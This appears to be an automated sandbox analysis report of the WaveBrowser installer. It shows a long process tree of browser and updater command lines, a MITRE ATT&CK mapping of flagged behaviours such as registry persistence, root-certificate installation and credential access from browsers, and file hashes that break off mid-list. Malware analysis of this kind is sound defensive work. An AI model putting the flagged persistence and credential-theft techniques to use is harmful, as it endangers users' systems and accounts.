C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6344,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6356 /prefetch:85⤵PID:7532
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7832,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7804 /prefetch:85⤵PID:2300
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7836,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4600 /prefetch:85⤵PID:2752
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6584,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6624 /prefetch:85⤵PID:5216
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7640,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4504 /prefetch:85⤵PID:6468
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8600,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9180 /prefetch:85⤵PID:6476
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8620,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8556 /prefetch:85⤵PID:6700
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4812,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8616 /prefetch:85⤵PID:8280
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7196,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6844 /prefetch:85⤵PID:2284
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7960,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8048 /prefetch:85⤵PID:6444
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6848,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8108 /prefetch:85⤵PID:5196
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7148,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7184 /prefetch:85⤵PID:8528
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8496,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7760 /prefetch:85⤵PID:8148
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6596,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6608 /prefetch:85⤵PID:8484
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5528,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8472 /prefetch:85⤵PID:8372
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5468,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7852 /prefetch:85⤵PID:7408
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5460,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8220 /prefetch:85⤵PID:1028
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5488,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8980 /prefetch:85⤵PID:7776
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5452,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8628 /prefetch:85⤵PID:3484
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9184,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8416 /prefetch:85⤵PID:5252
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9160,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3984 /prefetch:85⤵PID:9104
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3212,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6628 /prefetch:85⤵PID:8872
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4600,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5884 /prefetch:85⤵PID:2068
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3932,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3232 /prefetch:85⤵PID:1440
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5476,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5836 /prefetch:85⤵PID:2388
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2408,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3380 /prefetch:85⤵PID:9384
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6988,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6952 /prefetch:85⤵PID:9396
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5672,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9224 /prefetch:85⤵PID:9408
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5864,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9372 /prefetch:85⤵PID:9496
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4888,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5708 /prefetch:85⤵PID:10008
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9616,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9632 /prefetch:85⤵PID:10124
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9772,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9780 /prefetch:85⤵PID:9808
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9932,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9944 /prefetch:85⤵PID:10108
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5852,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10092 /prefetch:85⤵PID:2892
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9936,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9612 /prefetch:85⤵PID:9908
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10372,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10112 /prefetch:85⤵PID:10032
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10532,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10540 /prefetch:85⤵PID:10104
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9776,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10700 /prefetch:85⤵PID:9308
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6912,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10692 /prefetch:85⤵PID:6492
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --field-trial-handle=11012,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11036 /prefetch:25⤵
- Checks computer location settings
PID:7312
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11992,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12044 /prefetch:85⤵PID:9460
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8788,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12064 /prefetch:85⤵PID:9536
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11656,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12324 /prefetch:85⤵PID:9516
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12004,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12356 /prefetch:85⤵PID:9476
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12012,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12500 /prefetch:85⤵PID:9492
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12020,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12644 /prefetch:85⤵PID:9588
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12028,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12900 /prefetch:85⤵PID:9556
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=7444,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10972 /prefetch:25⤵PID:5632
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --field-trial-handle=9164,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4492 /prefetch:25⤵
- Checks computer location settings
PID:9412
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8328,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3516 /prefetch:85⤵PID:6484
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --field-trial-handle=4700,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10616 /prefetch:15⤵
- Checks computer location settings
PID:8028
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5560,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4788 /prefetch:85⤵PID:6988
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=10144,i,15415501830220767286,5331153808907274137,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4440 /prefetch:85⤵PID:7800
-
-
-
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJTV1VwZGF0ZXIiIHVwZGF0ZXJ2ZXJzaW9uPSIxLjMuMTM1LjAiIHNoZWxsX3ZlcnNpb249IjEuMy4xMzUuMCIgaXNtYWNoaW5lPSIwIiBzZXNzaW9uaWQ9Ins1RDVBQTE1NS00M0Q1LTQ1QTMtQThFQy1CNEM2RkU3RTU5OEF9IiB1c2VyaWQ9Ins5NDBlZTU3NS1jNTk0LTRmNjQtOGE5Ni0yNGJmOWI2MGJkYWJ9IiBpbnN0YWxsc291cmNlPSJvdGhlcmluc3RhbGxjbWQiIHJlcXVlc3RpZD0iezNCNjZGNEI4LUI3RUQtNDdEQS05N0Q1LTNGQ0U3ODFDRTQ5NH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7RUIxNDlBRDItQ0U0RS00RjUxLUI3RkMtQTE0OUZBQTRDQ0FGfSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMS41LjE5LjQiIGxhbmc9ImVuIiBicmFuZD0iIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iLTEiIGluc3RhbGxkYXRlPSItMSI-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb3dubG9hZGVyPSJ3aW5odHRwIiB1cmw9Imh0dHBzOi8vY2RuLnN3dXBkYXRlci5jb20vYnVpbGQvV2F2ZUJyb3dzZXIvc3RhYmxlL3dpbi8xMTIwOTg3NzA5NDQ0LzY0L1dhdmVJbnN0YWxsZXItdjEuNS4xOS40LmV4ZSIgZG93bmxvYWRlZD0iMTAxMDA4Nzg0IiB0b3RhbD0iMTAxMDA4Nzg0IiBkb3dubG9hZF90aW1lX21zPSIxMDUyNyIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjkxMiIgZG93bmxvYWRfdGltZV9tcz0iMTEzNjciIGRvd25sb2FkZWQ9IjEwMTAwODc4NCIgdG90YWw9IjEwMTAwODc4NCIgaW5zdGFsbF90aW1lX21zPSIxNTE2MCIvPjwvYXBwPjwvcmVxdWVzdD42⤵
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3252
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --strtl=ti1⤵PID:4972
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\WaveBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\WaveBrowser\User Data" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.19.4 --initial-client-data=0xfc,0x108,0x104,0xf4,0x110,0x7ff8ad2cccf0,0x7ff8ad2cccfc,0x7ff8ad2ccd082⤵PID:3132
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:5200
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Browser Extensions
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Component Object Model Hijacking
1Image File Execution Options Injection
1Power Settings
1Privilege Escalation
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Component Object Model Hijacking
1Image File Execution Options Injection
1Defense Evasion
Impair Defenses
1Modify Registry
6Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Network Service Discovery
1Network Share Discovery
1Peripheral Device Discovery
2Query Registry
8System Information Discovery
8System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.6MB
MD5209a03c83ff0dd9c8d51bec5c589a35d
SHA110dabe9637c9c0c67255f3fb8b0f6b8374e0a425
SHA256dd706dc49981d556a9df1a934665a312858ba4b602b8d32d31ffca74fa273ed1
SHA512de24e2ab70cf36b46283e1c97afcd207fc1c768803a85446d971895b8efe8f5ea8074cd6427c38ce9833587bf86a5452b57210acb344fb57d2fe8715196927c7
-
Filesize
1.5MB
MD5a3d27080831d6755c1b948a83cdf97ef
SHA1e960a89e801d0ebabcc56aa68dbc4a567c908e87
SHA256dfd139cbdfb28935ba00dba2d44c126af6366e8586201b68a609cec913086dd1
SHA51298aa8cafb43615fc317b1606b14120a61be0a7fab0f5731dc5a5f0fcf54cf5dc79b540f925f96bfd0e3a849d3767bbbcbf28fe2a2ab9534bc5b5f6e72b04717e
-
Filesize
2.6MB
MD5f5005b13be5fcc6e10af2bf18ed7a1b2
SHA1a1456e726af09179da5476fbae4983052d39c072
